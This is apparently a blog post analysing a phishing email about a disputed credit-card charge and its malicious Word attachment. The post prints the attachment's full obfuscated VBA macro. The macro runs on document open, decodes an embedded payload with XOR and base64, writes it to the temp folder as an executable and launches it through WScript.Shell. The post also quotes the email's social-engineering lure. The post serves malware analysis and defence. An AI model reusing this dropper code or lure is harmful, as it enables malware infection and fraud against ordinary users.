I received the following email from our address on a clients system (with their email domain name redacted):
From: denise@chefspecialties.com [mailto:denise@chefspecialties.com]
Sent: Thursday, June 16, 2016 6:36 AM
Subject: Re: unknown charge on my cardWhat is this $816.27 charge on my credit card?
It shows this amount charged by <REDACTED DOMAIN NAME>.
Please check the screenshot i have attached and tell me what is this about?Thank you
Denise Allen
Chef Specialties
P: 814.3217085
F: 814.2353106
The email also included an attachment “<REDACTED DOMAIN NAME>_card_screenshot.doc” that showed as follows:
Enable content to adjust this document to your version of Microsoft Word
The document contained three chunks of VBA code:
Microsoft Word Objects – ThisDocument
Public Sub AutoOpen()
Dim bishop As String
Dim anorexy As Long
Dim corkscreq As Integer
Dim precentor As Variant
corkscreq = Sin(19)
If corkscreq < 7 + 41 - 463 Then
PrintAll
Else
Dim unforbidden As String
ich = catholic.Visible
For niggling = 20 To 71
addiction = 71
alpenstock = Lcase("CON") & Ucase("deMnE") & StrReverse("d")
alpenstock = Ucase("Te") + StrReverse("ikayir")
Next niggling
End If
End Sub
Sub PrintAll()
Dim aDoc As Document
For Each aDoc In Documents
aDoc.PrintOut
Next
End Sub
Sub InsertParagraphMethod()
Dim MyRange As Object
Set MyRange = ActiveDocument.Range
' Selection Example:
Selection.InsertParagraph
' Range Example:
MyRange.Collapse Direction:=wdCollapseStart
MyRange.InsertParagraph
End Sub
Forms – catholic
Sub UserForm_Initialize() If Sin(3) <> 30 Then certificate.cheep End If End Sub
Modules – Certificate
Sub congenially(palate, anodyne)
Open palate For Binary Access Read Write As #anodyne
End Sub
Function harumscarum(disputes) As String
Dim dizzard As Long
Dim respectableness As Integer
Dim pinscher As String
Dim gynecaeum(63) As Long
Dim dios As Long
Dim loquaciously() As Byte
Dim concavely As Long
Dim fringillidae(63) As Long
Dim ahead As Long
Dim poncho() As Byte
Dim climb(63) As Long
Dim conditional(255) As Byte
septrional = 4096
algal = 4032
bebas = 65 + 60 - 72 + 65227
fiat = 16711680
crispinus = 262144
rive = 63
ordination = 50 + 16515022
harken = 258048
eupatorium = 44 + 211
crescent = 103 + 153
lyginopteris = 64
nimiety = 1 - 110 + 65645
Dim rousseauan As Variant
Dim asexual() As Byte
asexual = StrConv(disputes, vbFromUnicode)
Dim percina As Integer
For cates = 0 To UBound(asexual)
asexual(cates) = asexual(cates) Xor 18
Next cates
For bicuspid = 23 To 53
redbud = 53
excipiendis = Right("livelinessgy", 2) + "psum"
excipiendis = "no" + Mid("richesnelectivelisting", 7, 9)
Next bicuspid
pasigraphy = StrConv(asexual, vbUnicode)
respectableness = 2
For dizzard = 0 To 255
Select Case dizzard
Case 65 To 90
conditional(dizzard) = dizzard - 65
Case 97 To 122
conditional(dizzard) = dizzard - 71
Case 48 To 57
conditional(dizzard) = dizzard + 4
Case 43
conditional(dizzard) = 62
Case 47
conditional(dizzard) = 63
End Select
Next dizzard
For dizzard = 0 To 63
gynecaeum(dizzard) = dizzard * lyginopteris
fringillidae(dizzard) = dizzard * septrional
climb(dizzard) = dizzard * crispinus
Next dizzard
loquaciously = StrConv(pasigraphy, vbFromUnicode)
afric = 43 - 39
ReDim poncho((((UBound(loquaciously) + 1) \ afric) * 3) - 1)
For ahead = 0 To UBound(loquaciously) Step 4
concavely = climb(conditional(loquaciously(ahead))) + fringillidae(conditional(loquaciously(ahead + 1))) + _
gynecaeum(conditional(loquaciously(ahead + 2))) + conditional(loquaciously(ahead + 3))
dizzard = concavely And fiat
poncho(dios) = dizzard \ nimiety
dizzard = concavely And bebas
poncho(dios + 1) = dizzard \ crescent
poncho(dios + 2) = concavely And eupatorium
dios = dios + 3
Next ahead
pinscher = StrConv(poncho, vbUnicode)
If respectableness Then pinscher = Left$(pinscher, Len(pinscher) - respectableness) + vbNullChar + vbNullChar
harumscarum = pinscher
End Function
Sub balanoposthitis(asthenosphere, v)
Dim psychopharmacological As Variant
Set whig = asthenosphere
holiness = 119 - 118
If Sin(holiness) <> 68 Then
forfeiture = Lcase("RU") & Right("goodkinghenryn", 1)
Else
forfeiture = "drawbridge"
End If
novo = CallByName(whig, forfeiture, holiness, v)
End Sub
Public Sub plow(gable, ByRef up, aerially, compulsatory)
Dim nosiness As Byte
Dim catalyst() As Byte
Dim heft As String
catalyst = classificatory(aerially)
chicote = queen
beaujolais = up
Put #beaujolais, , catalyst
End Sub
Sub HeaderFooterProperty()
Dim MyText As String
MyText = "<Replace this with your text>"
ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader
Selection.HeaderFooter.Range.Text = "MyText"
ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument
End Sub
Sub cheep()
turnery = 62
Select Case turnery
Case 18 To 21
Dim aeequa As String
Dim elanus As Variant
articulate = StrReverse("wol") + Left("landerescription", 5) + Left("rplastering", 1)
Case 62
competitiveness = "fogged"
Dim capricornis As String
Dim catwalk As String
End Select
ambulacrum = 25 + 51
Select Case ambulacrum
Case 2 To 5
Dim misery As Variant
Dim aequa As Byte
bezel = "br" + "evis"
Case 8 To 14
Dim avast As Byte
Dim spyeria As Variant
training = pennyroyal
Case 76
capricornis = strelitzia
Dim descendent As String
catwalk = capricornis + "\" + Mid("caffeinebilfolderol", 9, 3) + StrReverse("ilareta") + Ucase("tY.EXe")
End Select
poronotus = 39 + 29
Select Case poronotus
Case 14 To 15
Dim measurable As Integer
Dim scophthalmus As Variant
boatswain = illuminations
Case 33 To 38
Dim snowwhite As String
Dim hellbent As Long
frangi = troubled
Case 68
brawn = Mid("syllabicatecusceloporus", 12, 2) & "cumi" & Lcase("S")
berlin = FreeFile
myacidae = 0
End Select
countryside = 65
Select Case countryside
Case 39 To 42
Dim trinkgeld As Variant
Dim chambered As Long
razorsharp = accolade
Case 10 To 14
Dim whereby As Byte
Dim cage As Integer
atoms = StrReverse("hw") & StrReverse("teti") & Left("hornimpatience", 4)
Case 65
belching = myacidae
End Select
congenially catwalk, berlin
indicative = catholic.alstroemeriaceae
melopsittacus = indicative
autotomic = harumscarum(melopsittacus)
opportune = Ucase("mEd") + Left("iatorsqueegee", 5) + Mid("lindleyialimpractical", 8, 3)
cassiopeia = Left("chcontractually", 2) & Lcase("EaP")
cassava = nondigestible
clearness = 51
Select Case clearness
Case 37 To 44
Dim angloamerican As Long
Dim losings As Byte
ho = "ch" + "elicerous"
Case 20 To 21
Dim dynamics As String
Dim indorsement As Integer
tegatur = Right("fancyver", 3) & StrReverse("socur") & Lcase("e")
Case 51
adhibit = plum
lubricitate = Len(autotomic)
Call certificate.plow(autotomic, berlin, autotomic, indicative)
locomotion = piments
End Select
If atn(23) > 52 Then
accumulate = Lcase("IntE") & "rdicti" & "on"
Else
mammea = neuromotor
Close #berlin
End If
bluestone = 63 - 35 + 37
Select Case bluestone
Case 20 To 26
Dim nagami As Byte
Dim cricetus As Integer
methylated = Left("polyautarchic", 4) + StrReverse("ihprom") + StrReverse("ms")
Case 34 To 42
Dim masted As Long
Dim color As String
isoleucine = Mid("discorscyraison", 8, 2) & "nanc" & StrReverse("eh")
Case 65
Set abutment = CreateObject("WScript.Shell")
End Select
balanoposthitis abutment, catwalk
End Sub
Function classificatory(excavate)
Dim dhulhijja As Byte
Dim general As Integer
Dim mineralogy As Long
amazona = StrConv(excavate, 128)
hermannia = shoji
column = materialistically
dislike = deadened
homocercal = StrReverse("ta") & Mid("polariscopetributedsoapberry", 12, 8)
classificatory = amazona
End Function
Sub FormatTablesSelect()
Dim oTb As Table
For Each oTb In ActiveDocument.Tables
Select Case oTb.Style
Case "Light Shading - Accent 4"
oTb.AutoFitBehavior (wdAutoFitFixed)
oTb.Rows.Alignment = wdAlignRowCenter
oTb.Columns.PreferredWidth = InchesToPoints(0.6)
Case "Medium List 2 - Accent 4"
oTb.AutoFitBehavior (wdAutoFitWindow)
oTb.Rows.Alignment = wdAlignRowLeft
Case "Table Grid", "Table Normal"
oTb.Style = "Light Grid - Accent 4"
Case Else
oTb.Style = "Medium List 1 - Accent 4"
End Select
Next oTb
End Sub
Function strelitzia()
Dim elettaria As Variant
Dim immolation As Byte
acetous = "Scr" + StrReverse("nitpi") + StrReverse(".g")
nonprofit = Lcase("fILE") + "System" + Ucase("obJeCt")
If cos(89) > 68 Then
unoffending = counterrevolutionary
Else
nh = acetous + nonprofit
Dim established As Integer
Set remiform = VBA.CreateObject(nh)
End If
biretta = 41 - 79 + 39
strelitzia = CallByName(remiform, "GetSpecialFolder", biretta, 93 + 40 - 29 - 102)
End Function
This code seems to take an object/blob from within the word document (), decode and save the object/blob as a file (bilateraliTY.EXE), then execute it. A quick search for “bilateraliTY.EXE” brings up the following link from Payload Security:
The next step in investigating this malware would be dissecting the binary which is currently beyond my skills and/or level of caring.